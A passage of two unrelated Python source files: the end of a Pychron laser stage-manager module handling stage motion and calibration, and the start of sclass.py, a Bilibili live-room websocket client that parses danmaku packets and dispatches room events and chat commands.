self.info("slow to {} {},{}".format(cnt, x1, yy))
sc.timer = sc.timer_factory()
self.linear_move(
x1, yy, mode="absolute", set_stage=False, velocity=velocity
)
if verbose:
self.info("move to {}a {},{}".format(cnt, x2, yy))
# if n > 2 and not i * 2 >= n:
# line this scan line has more then 1 segment turn off laser at end of segment
if i + 2 < n and not xs[i + 1] == xs[i + 2]:
self.linear_move(
x2,
yy,
velocity=velocity,
mode="absolute",
set_stage=False,
block=True,
)
self.info("wait for move complete")
if end_callback is not None:
end_callback()
lasing = False
else:
self.linear_move(
x2,
yy,
velocity=velocity,
mode="absolute",
set_stage=False,
)
cnt += 1
flip = True
else:
flip = False
if flip:
direction *= -1
sc.block()
if verbose:
self.info("end raster")
def _move_polyline(self, pts, start_callback=None, end_callback=None):
if not isinstance(pts, list):
segs = pts.velocity_segments
segs = segs[:1] + segs
pts = [
dict(xy=(pi.x, pi.y), z=pi.z, velocity=vi)
for vi, pi in zip(segs, pts.points)
]
sc = self.stage_controller
self.linear_move(
pts[0]["xy"][0],
pts[0]["xy"][1],
update_hole=False,
use_calibration=False,
block=True,
)
sc.set_z(pts[0]["z"], block=True)
cpos = dict()
# set motors
for motor in ("mask", "attenuator"):
if motor in pts[0]:
self.parent.set_motor(motor, pts[0][motor])
cpos[motor] = pts[0][motor]
sc.set_program_mode("absolute")
sc.timer = sc.timer_factory()
if start_callback:
start_callback()
npts = pts[1:]
setmotors = dict()
for i, di in enumerate(npts):
xi, yi, zi, vi = di["xy"][0], di["xy"][1], di["z"], di["velocity"]
sc.set_z(zi)
block = False
for motor in ("mask", "attenuator"):
# fix next step sets motor should block
if i + 1 < len(npts):
dii = npts[i + 1]
if motor in dii and dii[motor] != cpos[motor]:
m = self.parent.get_motor(motor)
if not m.locked:
block = True
setmotors[motor] = dii[motor]
self.linear_move(
xi,
yi,
velocity=vi,
block=block,
mode="absolute", # use absolute mode because commands are queued
set_stage=False,
)
if block:
if end_callback:
end_callback()
for k, v in setmotors.items():
self.parent.set_motor(k, v, block=True)
if start_callback:
start_callback()
# wait until motion complete
sc.block()
if end_callback:
end_callback()
sc.set_program_mode("relative")
# if start and smooth:
# sc.execute_command_buffer()
# sc.end_command_buffer()
# def start_enqueued(self):
# sc = self.stage_controller
# sc.execute_command_buffer()
# sc.end_command_buffer()
def _move_to_point(self, pt):
self.debug("move to point={}".format(pt))
if isinstance(pt, str):
pt = self.canvas.get_point(pt)
self.debug("move to point canvas pt={}".format(pt))
if pt is not None:
pos = pt.x, pt.y
self.info(
"Move to point {}: {:0.5f},{:0.5f},{:0.5f}".format(
pt.identifier, pt.x, pt.y, pt.z
)
)
self.stage_controller.linear_move(block=True, *pos)
if hasattr(pt, "z"):
self.stage_controller.set_z(pt.z, block=True)
self.debug("Not setting motors for pt")
# self.parent.set_motors_for_point(pt)
self._move_to_point_hook()
self.info("Move complete")
self.update_axes()
def _move_to_hole(
self, key, correct_position=True, user_entry=False, autocenter_only=False
):
self.info("Move to hole {} type={}".format(key, str(type(key))))
autocentered_position = False
if not autocenter_only:
self.temp_hole = key
self.temp_position = self.stage_map.get_hole_pos(key)
pos = self.stage_map.get_corrected_hole_pos(key)
self.info("position {}".format(pos))
if pos is not None:
if abs(pos[0]) < 1e-6:
pos = self.stage_map.get_hole_pos(key)
# map the position to calibrated space
pos = self.get_calibrated_position(pos, key=key)
else:
# check if this is an interpolated position
# if so probably want to do an autocentering routine
hole = self.stage_map.get_hole(key)
if hole.interpolated:
self.info("using an interpolated value")
else:
self.info("using previously calculated corrected position")
autocentered_position = True
try:
self.stage_controller.linear_move(
block=True,
source="move_to_hole {}".format(pos),
raise_zero_displacement=True,
*pos
)
except TargetPositionError as e:
self.warning("(001) Move to {} failed".format(pos))
self.parent.emergency_shutoff(str(e))
return
except ZeroDisplacementException:
correct_position = False
try:
self._move_to_hole_hook(key, correct_position, autocentered_position)
except TargetPositionError as e:
self.warning("(002) Move failed. {}".format(e))
self.parent.emergency_shutoff(str(e))
return
self.finish_move_to_hole(user_entry)
self.info("Move complete")
def _move_to_hole_hook(self, *args):
pass
def _move_to_point_hook(self):
pass
# ===============================================================================
# Property Get / Set
# ===============================================================================
def _set_stage_map(self, v):
if v in self.stage_map_names:
for root, ext in ((self.root, ".txt"), (paths.user_points_dir, ".yaml")):
p = os.path.join(root, add_extension(v, ext))
if os.path.isfile(p):
self.info("setting stage map to {}".format(v))
sm = self.stage_map_klass(file_path=p)
self.canvas.set_map(sm)
self.tray_calibration_manager.load_calibration(stage_map=v)
self.points_programmer.load_stage_map(sm)
return True
else:
self.warning('No stage map named "{}"'.format(v))
return False
def _get_calibrate_stage_label(self):
if self._calibration_state == "set_center":
r = "Locate Center"
elif self._calibration_state == "set_right":
r = "Locate Right"
else:
r = "Calibrate Stage"
return r
def _get_program_points_label(self):
return "Program Points" if not self.canvas.markup else "End Program"
def _validate_hole(self, v):
nv = None
try:
if v.strip():
nv = int(v)
except TypeError:
self.warning("invalid hole {}".format(v))
return nv
# def _get_calibrated_position_entry(self):
# return self._calibrated_position
#
# def _set_calibrated_position_entry(self, v):
# self._calibrated_position = v
# if XY_REGEX.match(v):
# self._move_to_calibrated_position(v)
# else:
# self.move_to_hole(v)
def _move_to_calibrated_position(self, pos):
try:
args = csv_to_floats(pos)
except ValueError:
self.warning(
'invalid calibrated position "{}". Could not convert to floats'.format(
pos
)
)
return
if len(args) == 2:
x, y = args
self.linear_move(x, y, use_calibration=True, block=False)
else:
self.warning(
'invalid calibrated position. incorrect number of arguments "{}"'.format(
args
)
)
def _set_point(self, v):
if self.canvas.calibrate:
self.warning_dialog("Cannot move while calibrating")
return
if self.canvas.markup:
self.warning_dialog("Cannot move while adding/editing points")
return
if (
self.move_thread is None or not self.move_thread.isRunning()
) and v is not self._point:
pos = self.canvas.get_item("point", int(v) - 1)
if pos is not None:
self._point = v
self.move_thread = Thread(target=self._move_to_point, args=(pos,))
self.move_thread.start()
else:
err = "Invalid point {}".format(v)
self.warning(err)
return err
def _get_point(self):
return self._point
# ===============================================================================
# handlers
# ===============================================================================
def _manual_override_position_button_fired(self):
sm = self.stage_map
pos = self.calibrated_position_entry
hole = self.stage_map.get_hole(pos)
if hole is not None:
x, y = self.stage_controller.x, self.stage_controller.y
sm.set_hole_correction(pos, x, y)
sm.dump_correction_file()
self.info(
"updated {} correction file. Saved {}: {},{}".format(
sm.name, pos, x, y
)
)
def _stop_button_fired(self):
self._stop()
def _ejoystick_fired(self):
self.joystick = not self.joystick
if self.joystick:
self.stage_controller.enable_joystick()
self.joystick_label = "Disable Joystick"
self.joystick_timer = self.timer_factory(
func=self._joystick_inprogress_update
)
else:
if self.joystick_timer is not None:
self.joystick_timer.Stop()
self.stage_controller.disable_joystick()
self.joystick_label = "Enable Joystick"
def _home_fired(self):
""" """
t = Thread(name="stage.home", target=self._home)
t.start()
# need to store a reference to thread so it is not garbage collected
self.move_thread = t
# do_later(self._home)
def _test_fired(self):
# self.do_pattern('testpattern')
self.do_pattern("pattern003")
# ===============================================================================
# factories
# ===============================================================================
def _motion_configure_factory(self, **kw):
return MotionControllerManager(
motion_controller=self.stage_controller, application=self.application, **kw
)
def _stage_controller_factory(self):
if self.stage_controller_klass == "Newport":
from pychron.hardware.newport.newport_motion_controller import (
NewportMotionController,
)
factory = NewportMotionController
elif self.stage_controller_klass == "Aerotech":
from pychron.hardware.aerotech.aerotech_motion_controller import (
AerotechMotionController,
)
factory = AerotechMotionController
elif self.stage_controller_klass == "Zaber":
from pychron.hardware.zaber.zaber_motion_controller import (
LegacyBinaryZaberMotionController,
)
factory = LegacyBinaryZaberMotionController
m = factory(
name="{}controller".format(self.name),
configuration_name="stage_controller",
configuration_dir_name=self.configuration_dir_name,
parent=self,
)
return m
def _canvas_factory(self):
""" """
w = 640 / 2.0 / 23.2
h = 0.75 * w
l = LaserTrayCanvas(
stage_manager=self,
padding=[30, 5, 5, 30],
map=self.stage_map,
view_x_range=[-w, w],
view_y_range=[-h, h],
)
return l
# ===============================================================================
# defaults
# ===============================================================================
def _motion_controller_manager_default(self):
return self._motion_configure_factory()
def _title_default(self):
return "%s Stage Manager" % self.name[:-5].capitalize()
def _points_programmer_default(self):
pp = PointsProgrammer(
canvas=self.canvas, stage_map_klass=self.stage_map_klass, stage_manager=self
)
pp.on_trait_change(self.move_to_point, "point")
pp.on_trait_change(self.move_polygon, "polygon")
pp.on_trait_change(self.move_polyline, "line")
return pp
# ===============================================================================
# mass spec hacks
# ===============================================================================
# _temp_position = None
# def _get_temp_position(self):
# return self._temp_position
#
# def _set_temp_position(self, v):
# self._temp_position = v
#
# temp_position = property(fget=_get_temp_position,
# fset=_set_temp_position)
if __name__ == "__main__":
from pychron.core.helpers.logger_setup import logging_setup
logging_setup("stage_manager")
name = "diode"
s = StageManager(
name="{}stage".format(name),
configuration_dir_name=name,
# parent = DummyParent(),
window_width=945,
window_height=545,
)
# from pychron.initializer import Initializer
#
# i = Initializer()
# i.add_initialization(dict(name = 'stage_manager',
# manager = s
# ))
# i.run()
# s.update_axes()
s.load()
s.stage_controller.bootstrap()
s.configure_traits()
# ========================EOF============================
# view groups
# ===============================================================================
# def _hole__group__(self):
# g = Group(HGroup(Item('hole'), spring))
# return g
# def _position__group__(self):
# g = Group(HGroup(Item('calibrated_position_entry', label='Position',
# tooltip='Enter a x,y point in reference frame space',
# ), spring))
# g = Group(
# Item('calibrated_position_entry',
# show_label=False,
# tooltip='Enter a positon e.g 1 for a hole, or 3,4 for X,Y'
# ), label='Calibrated Position',
# show_border=True)
# return g
# def _button__group__(self):
# '''
# '''
# vg = VGroup()
#
# home = self._button_factory(*self.buttons[0])
# calibrate_stage = self._button_factory(*self.buttons[1])
#
# vg.content.append(HGroup(calibrate_stage, home,
# Item('home_option',
# editor=EnumEditor(values=self.home_options),
# show_label=False)))
#
# if len(self.buttons) > 2:
# # vg.content.append(self._button_group_factory(self.buttons[:2], orientation = 'h'))
# vg.content.append(self._button_group_factory(self.buttons[2:], orientation='h'))
# return vg
# def _axis__group__(self):
# '''
# '''
# return Item('stage_controller', show_label=False, style='custom')
#
#
# def _sconfig__group__(self):
# '''
# '''
# return Group(
# # Item('pattern_manager',
# # label='Pattern',
# # editor=InstanceEditor(view='execute_view'),
# # show_label=False, style='custom'
# # ),
#
# Group(
# Item('canvas', show_label=False,
# editor=InstanceEditor(view='config_view'),
# style='custom'
# ),
# label='Canvas'),
#
# # Group(Item('motion_controller_manager', editor=InstanceEditor(view='configure_view'),
# # style='custom', show_label=False),
# # Item('motion_profiler', style='custom', show_label=False),
# # label='Motion'
# # ),
#
# # Group(
# # self._button_factory('program_points', 'program_points_label'),
# # Item('accept_point', show_label=False),
# # Item('load_points', show_label=False),
# # Item('save_points', show_label=False),
# # Item('clear_points', show_label=False),
# # label='Points'),
# Item('points_programmer',
# label='Points',
# show_label=False, style='custom'),
# Item('tray_calibration_manager',
# label='Calibration',
# show_label=False, style='custom'),
# # Item('pattern_manager',
# # label='Pattern',
# # editor=InstanceEditor(view='execute_view'),
# # show_label=False, style='custom'
# # ),
#
# # Item('output', show_label = False, style = 'custom'),
#
# # Item('jog_manager', show_label = False, style = 'custom',
# # resizable=False
# # ),
# layout='tabbed'
# )
|
sclass.py
|
from abc import ABCMeta, abstractmethod
from zlib import decompress
from collections import namedtuple
from biliLive.http_api import Link
from threading import Thread, Lock
import biliLive.bilibiliApi as bapi
import requests
import sys
import os
import time
import websocket
import json
import struct
HeaderTuple = namedtuple('HeaderTuple', ('pack_len', 'raw_header_size', 'ver', 'operation', 'seq_id'))
HEADER_STRUCT = struct.Struct('>I2H2I')
WS_OP_HEARTBEAT = 2, #心跳
WS_OP_HEARTBEAT_REPLY = 3 # 心跳回应
WS_OP_MESSAGE = 5 # 弹幕,消息等
WS_OP_USER_AUTHENTICATION = 7 # 用户进入房间
WS_OP_CONNECT_SUCCESS = 8 # 进房回应
class User(Link, metaclass=ABCMeta):
def __init__(self, headers, userData):
super().__init__(headers)
self.api = bapi.BiliApi(headers)
# 用户id
self.id = userData["mid"]
# 用户
self.name = userData["uname"]
# 用户头像
self.cover = userData["face"]
# 用户等级
self.level = userData["level"]["current_level"]
# 用户经验
self.exp = userData["level"]["current_exp"]
# 用户下一级经验
self.upExp = userData["level"]["next_exp"]
# 抽象直播间
class Live(Link, metaclass=ABCMeta):
def __init__(self, headers, liveData):
super().__init__(headers)
self.api = bapi.BiliApi(headers)
self.commandList = None
# 房间号
self.id = liveData["room_id"]
# 标题
self.name = liveData["title"]
# 标签
self.tags = liveData["tags"].split(",")
# 主播uid
self.userId = liveData["uid"]
# 主播
self.userName = liveData["uname"]
# 主播粉丝数
self.attention = liveData["attention"]
# 房间介绍
self.description = liveData["description"]
# 人气
self.online = liveData["online"]
# 房间地址
self.liveUrl = liveData["live_url"]
# 房间封面
self.cover = liveData["cover"]
# 房间背景
self.background = liveData["background"]
# 房间分区
self.area = {
"parent_area":[liveData["parent_area_id"], liveData["parent_area_name"]],
"area": [liveData["area_id"], liveData["area_name"]]
}
# 房间分区转字符串
self.area_str = "%s · %s" % (self.area["parent_area"][1], self.area["area"][1])
# 房间开播时间
self.live_time = liveData["live_time"]
# 房间直播id
self.live_id = liveData["live_id"]
self._getLiveRoomStyle()
# 弹幕轮查间隙时间 (秒)
self.msg_loop_sleep = 2
self.__code = None
self.bind()
def get_live(room_id):
api = f"https://api.live.bilibili.com/xlive/web-room/v1/index/getDanmuInfo?id={room_id}&type=0"
with requests.get(api) as req:
data = req.json()["data"]
host, port = data["host_list"][0]["host"], data["host_list"][0]["wss_port"]
return host, port, data["token"]
# 信息流服务器列表
host, port, token = get_live(self.id)
self.host_list = ["wss://%s:%s/sub" % (host, port)]
# 认证包正文
self.certificationPack = {
"roomid": self.id,
"uid": 0,
"protover": 1,
"platform": "web",
"clientver": "1.4.0",
"key": token,
"type": 2
}
self.wsAppEvent = {
WS_OP_HEARTBEAT_REPLY: self.heart_beat_reply,
WS_OP_MESSAGE: self.new_message,
WS_OP_CONNECT_SUCCESS: self.connect_success
}
# 直播间cmd
self.liveEvent = {
# 弹幕
"DANMU_MSG": self._message,
# 普通用户进入房间
"INTERACT_WORD": self.__event.welcome,
# 老爷(直播会员)进入房间
"WELCOME_GUARD": self.__event.welcome_guard,
# 舰长进入房间
"ENTRY_EFFECT": self.__event.entry_effect,
# SC留言
"SUPER_CHAT_MESSAGE": self.__event.super_msg,
# SC留言
"SUPER_CHAT_MESSAGE_JPN": self.__event.super_msg,
# 投喂礼物
"SEND_GIFT": self.__event.send_gift,
# 连击礼物
"COMBO_SEND": self.__event.combo_send_gift,
# 直播游戏 也是送礼物(不知道有什么用)
"LIVE_INTERACTIVE_GAME": self.__event.send_gift_game,
# 天选之人开始
"ANCHOR_LOT_START": self.__event.anchor_lot_start,
# 天选之人结束
"ANCHOR_LOT_END": self.__event.anchor_lot_end,
# 天选之人结果
"ANCHOR_LOT_AWARD": self.__event.anchor_lot_award,
# 上舰长
"GUARD_BUY": self.__event.guard_buy,
# 续费了舰长
"USER_TOAST_MSG": self.__event.guard_renew,
# 大公告
"NOTICE_MSG": self.__event.notice_msg,
# 小时榜变动
"ACTIVITY_BANNER_UPDATE_V2": self.__event.activity_banner_update,
# 关注数变动
"ROOM_REAL_TIME_MESSAGE_UPDATE": self.__event.room_data_update,
# 高能榜变动
"ONLINE_RANK_V2": self.__event.online_rank,
# 主播榜变动
"ONLINE_RANK_COUNT": self.__event.live_rank,
# 热门榜变动
"HOT_RANK_CHANGED_V2": self.__event.hot_rank,
# 热门榜计数? (不清楚能干嘛)
"HOT_RANK_CHANGED": self.__event.hot_rank_changed,
# 直播活动变动 (我估计这里一直会变直接留空了 需要的写)
"WIDGET_BANNER": self.__event.activity,
# 热门榜限时上榜
"HOT_RANK_SETTLEMENT_V2": self.__event.hot_rank_settlement,
# 同上 这个数据少
"HOT_RANK_SETTLEMENT": self.__event.hot_rank_settlement,
# 停止直播室名单 (下播名单?)
"STOP_LIVE_ROOM_LIST": self.__event.stop_live_room_list,
# pk数据
"PK_BATTLE_PROCESS": self.__event.pk_battle_process,
# pk数据新
"PK_BATTLE_PROCESS_NEW": self.__event.pk_battle_process_new,
# pk决赛
"PK_BATTLE_FINAL_PROCESS": self.__event.pk_battle_process_final,
# pk结束
"PK_BATTLE_END": self.__event.pk_battle_end,
# pk结算
"PK_BATTLE_SETTLE_USER": self.__event.pk_battle_settle_user,
# pk结算
"PK_BATTLE_SETTLE_V2": self.__event.pk_battle_settle,
# pk连胜
"COMMON_NOTICE_DANMAKU": self.__event.common_notice_danmaku,
"ENTRY_EFFECT_MUST_RECEIVE": self.__event.miscellaneous,
}
def bind(self, commandList=None, event=None):
if event is None:
self.__event = bapi.event()
self.__event.live = self
else:
self.__event = event
self.__event.live = self
if commandList is None:
self.__commandList = bapi.commandList()
self.__commandList.event = self.__event
else:
self.__commandList = commandList
self.__commandList.event = self.__event
def _getLiveRoomStyle(self):
roomUserData = self.api.getLiveRoomUserData(self.id)
self.style = {
"msgColor": roomUserData["property"]["danmu"]["color"]
}
def _getMsgStyle(self, msg):
msg = {
"color": self.style["msgColor"],
"send_time": int(time.time()),
"msg": msg
}
return msg
def make_packet(self, data, operation):
body = json.dumps(data).encode('utf-8')
header = HEADER_STRUCT.pack(
HEADER_STRUCT.size + len(body),
HEADER_STRUCT.size,
1,
operation,
1
)
return header + body
def set_body(self, message):
header = HeaderTuple(*HEADER_STRUCT.unpack_from(message, 0))
body = message[HEADER_STRUCT.size: header.pack_len]
if header.ver == 2:
return self.set_body(decompress(body))
else:
try:
return header, json.loads(body.decode())
except:
# 心跳包回应
popularity =int.from_bytes(message[HEADER_STRUCT.size: HEADER_STRUCT.size + 4],'big')
return header, popularity
def _msg_loop(self, debug=False):
def loop():
if debug:
websocket.enableTrace(True)
# 设置连接
wsapp = websocket.WebSocketApp(self.host_list[0],
on_message=self.on_message, on_ping=self.on_ping, on_pong=self.on_pong, on_close=self.on_close,
on_error=self.on_error)
wsapp.on_open = self.on_open
# 打开连接
wsapp.run_forever(ping_interval=40, ping_timeout=30)
thread = Thread(target=loop)
thread.setDaemon(True)
thread.start()
self.msg_loop_thread = thread
def on_message(self, wsapp, message):
"""
事件 on_message 接收服务器数据
"""
# 数据解析
header, message = self.set_body(message)
# 事件执行
if header.operation in self.wsAppEvent:
self.wsAppEvent[header.operation](message)
else:
print("未知数据协议:%s" % message)
def on_ping(self, wsapp, message):
pass
def on_pong(self, wsapp, message):
"""
事件 on_pong 接收到服务器心跳包
"""
# 向服务器发送心跳包
print("发送心跳包...")
wsapp.send(self.make_packet({}, 2))
def on_open(self, wsapp):
"""
事件 on_open 连接启动
"""
# 发送认证包
print("正在连接 %s (id: %s)直播间, 发送认证包..." % (self.name, self.id))
wsapp.send(self.make_packet(self.certificationPack, 7))
def on_close(self, wsapp, close_status_code, close_msg):
print(wsapp, close_status_code, close_msg, "on_close........")
def on_error(wsapp, err):
print("Got a an error: ", err)
def heart_beat_reply(self, popularity):
"""
事件 heart_beat_reply 心跳回应
"""
self.__event.popularity_update(popularity)
def connect_success(self, message):
"""
事件 connect_success 进房回应
"""
print("连接成功! 接收到了服务器的进房回应")
def new_message(self, message):
"""
事件 new_message 直播间信息
"""
if message["cmd"] in self.liveEvent:
self.liveEvent[message["cmd"]](message)
else:
self.__event.miscellaneous(message)
def _message(self, message):
msg = format.msg(message)
commandSign, comm, commKey = self.__event.set_command_list(msg["msg"], self.__commandList.commandSign)
# 新弹幕回调
self.__event.msg_log(msg)
# 检查是否为指令
if commandSign != self.__commandList.commandSign:
return
# 查询指令列表
if not comm in self.__commandList.command:
self.__code = self.__commandList.commandNameError()
self.__event.command_err_log(self.__code, msg, "commandNameError")
return
# 执行指令对应方法
try:
# 检查指令权限
if comm in self.__commandList.purviewCommand:
if msg["userId"] in self.__commandList.purview:
self.__code = self.__commandList.command[comm](commKey, msg)
self.__event.command_log(self.__code, msg, comm)
else:
self.__code = self.__commandList.purviewError()
self.__event.command_err_log(self.__code, msg, "purviewError")
return
self.__code = self.__commandList.command[comm](commKey, msg)
self.__event.command_log(self.__code, msg, comm)
except IndexError:
# 执行指令错误回调
self.__code = self.__commandList.commandError()
self.__event.command_err_log(self.__code, msg, "commandError")
def time_loop_job(self, jobTime, job):
while True:
time.sleep(jobTime)
self.__event.command_log(job(), None, None)
def _time_loop(self):
send_msg_thread_list = []
for jobTime in self.__commandList.timeLoopList:
if type(self.__commandList.timeLoopList[jobTime]) == str:
def job():
return self.__event.send_msg(self.__commandList.timeLoopList[jobTime])
else:
job = self.__commandList.timeLoopList[jobTime]
thread = Thread(target=self.time_loop_job, args=(jobTime, job))
thread.setDaemon(True)
send_msg_thread_list.append(thread)
for thread in send_msg_thread_list:
thread.start()
self.send_msg_loop_thread = send_msg_thread_list
def msg_loop(self, debug=False):
self.__event.msg_loop(debug)
def time_loop(self):
self.__event.time_loop()
class Event(metaclass=ABCMeta):
def __init__(self):
self.live = None
@abstractmethod
def set_command_list(self, msg, commandSign):
"""
设置指令格式, 默认使用 任意指令标识符, 参数空格隔开
叁数:
msg: 弹幕数据列表
commandSign: 当前绑定的指令标识符
需返回: 指令标识符, 无标识符的指令字段, 指令参数
"""
command_list = msg.strip(" ").split(" ")
commandSign = list(command_list[0])[0]
comm = command_list[0].strip(commandSign)
commKey = command_list[1:]
return commandSign, comm, commKey
@abstractmethod
def send_msg(self, msg):
"""
send_msg 发送弹幕\n
父类参数: self.id , self._getMsgStyle(msg)
self._getMsgStyle: 用户当前弹幕样式
self.id: 房间号
"""
return self.live.api.sendLiveMsg(self.live.id, self.live._getMsgStyle(msg))
@abstractmethod
def time_loop(self):
"""
事件 time_loop 启动定时发送
"""
self.live._time_loop()
@abstractmethod
def msg_loop(self, debug):
"""
事件 msg_loop 启动弹幕轮查
"""
self.live._msg_loop(debug)
@abstractmethod
def msg_log(self, msg):
"""
事件 msg_log 新弹幕会经过这里
"""
print("%s: %s" % (msg["userName"], msg["msg"]))
@abstractmethod
def command_log(self, code, msg, comm):
"""
事件 command_log 指令执行成功
"""
# 定时发送调用时的默认数据格式 code, None, None
if msg is None and comm is None:
if code == 0:
print('定时发送成功')
else:
print('定时发送失败... code:%s' % code)
return
print('"%s: %s" 执行成功 -> %s' % (msg["userName"], msg["msg"], comm))
@abstractmethod
def command_err_log(self, code, msg, comm):
"""
事件 command_err_log 指令执行错误
"""
print('"%s: %s" 指令执行错误 -> %s' % (msg["userName"], msg["msg"], comm))
def welcome(self, msg):
"""
事件 welcome 普通用户进入房间
"""
msg = format.welcome(msg)
print("%s 进入了房间!" % msg["userName"])
def welcome_guard(self, msg):
"""
事件 welcome_guard 老爷用户进入房间
"""
print(msg)
def entry_effect(self, msg):
"""
事件 entry_effect 舰长进入房间(不确定)
"""
msg = format.entry_effect(msg)
print(msg["copy_writing"])
def super_msg(self, msg):
"""
事件 super_msg SC留言
"""
msg = format.super_msg(msg)
print("%s发送了价值%s的SE! 时长%s: %s" % (msg["userName"], msg["price"],
msg["endTime"], msg["msg"]))
def send_gift(self, msg):
"""
事件 send_gift 投喂礼物
"""
msg = format.send_gift(msg)
print("%s%s了%s个%s!" % (msg["userName"], msg["action"], msg["num"], msg["giftName"]))
def combo_send_gift(self, msg):
"""
事件 combo_send_gift 连击投喂礼物
"""
msg = format.send_gift(msg)
print("%s连击%s了%s个%s!" % (msg["userName"], msg["action"], msg["num"], msg["giftName"]))
def send_gift_game(self, msg):
"""
事件 send_gift_game 直播游戏
"""
msg = format.send_gift(msg)
print("%s送了%s个%s!" % (msg["userName"], msg["num"], msg["giftName"]))
def anchor_lot_start(self, msg):
"""
事件 anchor_lot_start 天选之人开始
"""
print(msg)
def anchor_lot_end(self, msg):
"""
事件 anchor_lot_end 天选之人结束
"""
print(msg)
def anchor_lot_award(self, msg):
"""
事件 anchor_lot_award 天选之人结果
"""
msg, list_str = format.anchor_lot_award(msg), ""
for uesr in msg["userList"]:
list_str += uesr["uname"]
print("天选之人 %s 结果: %s" % (msg["name"], list_str))
def guard_buy(self, msg):
"""
事件 guard_buy 上舰长
"""
msg = format.guard_buy(msg)
print("%s开通了%s月%s" % (msg["userName"], msg["num"], msg["giftName"]))
def guard_renew(self, msg):
"""
事件 guard_renew 续费了舰长
"""
print(msg)
def notice_msg(self, msg):
"""
事件 notice_msg 大公告
"""
print(msg)
def activity_banner_update(self, msg):
"""
事件 activity_banner_update 小时榜变动
"""
print(msg)
def room_data_update(self, msg):
"""
事件 room_data_update 粉丝关注变动
"""
msg = format.room_data(msg)
print("关注变动! 关注数:%s 粉丝团人数:%s" % (msg["fans"], msg["fansClub"]))
def online_rank(self, msg):
"""
事件 online_rank 高能榜变更
"""
msg, data = msg['data']['list'], ""
for user in msg:
data += " %s-%s " % (user["uname"], user["score"])
print("高能榜变更! %s" % data)
def live_rank(self, msg):
"""
事件 live_rank 主播榜变更
"""
print("主播现在排在%s!" % msg["data"]["count"])
def hot_rank(self, msg):
"""
事件 hot_rank 热门榜变更
"""
msg = format.hot_rank(msg)
print("主播现在%s排在%s!" % (msg["rankDesc"], msg["rank"]))
def activity(self, msg):
"""
事件 activity 活动内容变更
我估计这里一直会变直接留空了 需要的写
"""
pass
def hot_rank_changed(self, msg):
"""
事件 hot_rank_changed 热门榜计数? (不清楚能干嘛)
"""
pass
def hot_rank_settlement(self, msg):
if msg["cmd"] == "HOT_RANK_SETTLEMENT":
return
msg = format.hot_rank_settlement(msg)
print(msg["rankDesc"])
def stop_live_room_list(self, msg):
"""
事件 stop_live_room_list 停止直播室名单 (下播名单?)
"""
pass
def popularity_update(self, popularity):
"""
事件 popularity_update 心跳回应更新人气值
"""
print("当前人气值: %s" % popularity)
def pk_battle_process(self, msg):
"""
事件 pk_battle_process pk数据
"""
print(msg)
def pk_battle_process_new(self, msg):
"""
事件 pk_battle_process_new pk数据新
"""
print(msg)
def pk_battle_process_final(self, msg):
"""
事件 pk_battle_process_final pk决赛
"""
print(msg)
def pk_battle_end(self, msg):
"""
事件 pk_battle_end pk结束
"""
print(msg)
def pk_battle_settle_user(self, msg):
"""
事件 pk_battle_settle_user pk结算
"""
print(msg)
def pk_battle_settle(self, msg):
"""
事件 pk_battle_settle pk结算
"""
print(msg)
def common_notice_danmaku(self, msg):
"""
事件 common_notice_danmaku pk连胜
"""
print(msg)
def miscellaneous(self, msg):
"""
事件 miscellaneous 未知事件全部会调用
"""
print("未知信息...")
class MsgList:
def __init__(self, msgList):
self.index = 0
self.msgList = msgList
self.data_len = len(msgList)
def __iter__(self):
return self
def __next__(self):
if self.index == self.data_len:
raise StopIteration
msg = self.msgList[self.index]
data = {
"time": msg["timeline"],
"msg": msg["text"],
"userName": msg["nickname"],
"userId": msg["uid"]
}
self.index += 1
return data
def getMsgTimeList(self):
return [msg["timeline"] for msg in self.msgList]
# 抽象指令对像
class CommandList(metaclass=ABCMeta):
def __init__(self):
self.event = None
self.purview = []
self.purviewCommand = []
self.command = {}
self.commandSign = "/"
self.timeLoopList = {}
@abstractmethod
def commandError(self):
"""
commandError 指令参数错误
"""
return self.event.send_msg("您的指令参数填错啦!")
@abstractmethod
def commandNameError(self):
"""
commandNameError 指令名字错误
"""
return self.event.send_msg("您的指令名字填错啦!")
@abstractmethod
def purviewError(self):
"""
purviewError 指令权限错误
"""
return self.event.send_msg("您的指令权限不足...")
class format:
"""
数据格式化
"""
@staticmethod
def msg(data):
"""
弹幕数据
msg: 内容
userId: 用户id
userName: 用户名
badge: 用户粉丝牌子
level: 用户直播用户等级
time: 时间
color: 弹幕颜色
"""
data = data["info"]
return {
"msg": data[1],
"userId": data[2][0],
"userName": data[2][1],
"badge": data[3],
"level": data[4][1],
"time": data[9]["ts"],
"color": data[9]["ct"],
}
@staticmethod
def send_gift(data):
"""
送礼物数据
action: 动作
giftId: 礼物id
giftName: 礼物名称
num: 送礼物数量
userName: 用户名
userId: 用户id
medal_info: 用户粉丝牌子
"""
data, cmd = data["data"], data["cmd"]
if cmd == "LIVE_INTERACTIVE_GAME":
data["medal_info"] = ""
data["action"] = ""
if cmd == "COMBO_SEND":
data["gift_num"] = data["total_num"]
if cmd == "SEND_GIFT":
return {
"action": "",
"giftId": data["giftId"],
"giftName": data["giftName"],
"num": data["num"],
"userName": data["uname"],
"userId": data["uid"],
"medal_info": data["medal_info"]
}
return {
"action": data["action"],
"giftId": data["gift_id"],
"giftName": data["gift_name"],
"num": data["gift_num"],
"userName": data["uname"],
"userId": data["uid"],
"medal_info": data["medal_info"]
}
@staticmethod
def welcome(data):
"""
普通用户进入房间数据
userName: 用户名
userId: 用户id
medal: 用户粉丝牌子
roomId: 直播间id
time: 时间
"""
data = data["data"]
return {
"userName": data["uname"],
"userId": data["uid"],
"medal": data["fans_medal"],
"roomId": data["roomid"],
"time": data["timestamp"]
}
@staticmethod
def entry_effect(data):
"""
舰长进入房间数据
copy_writing: 进入房间消息
userId: 用户id
basemap: 进入房间消息背景
face: 用户头像
privilegeType: 舰长类型
time: 时间
"""
data = data["data"]
return {
"copy_writing": data["copy_writing"],
"userId": data["uid"],
"basemap": data["basemap_url"],
"face": data["face"],
"privilegeType": data["privilege_type"],
"time": data["trigger_time"]
}
@staticmethod
def room_data(data):
"""
房间关注更新数据
roomId: 房间号
fans: 关注数
fansClub: 粉丝团人数
"""
data = data["data"]
return {
"roomId": data["roomid"],
"fans": data["fans"],
"fansClub": data["fans_club"]
}
@staticmethod
def hot_rank(data):
"""
热门榜更新数据
rank: 排名
name: 榜单名
rankDesc: 榜单简介
icon: 图标
time: 时间
"""
data = data["data"]
return {
"rank": data["rank"],
"name": data["area_name"],
"rankDesc": data["rank_desc"],
"icon": data["icon"],
"time": data["timestamp"]
}
@staticmethod
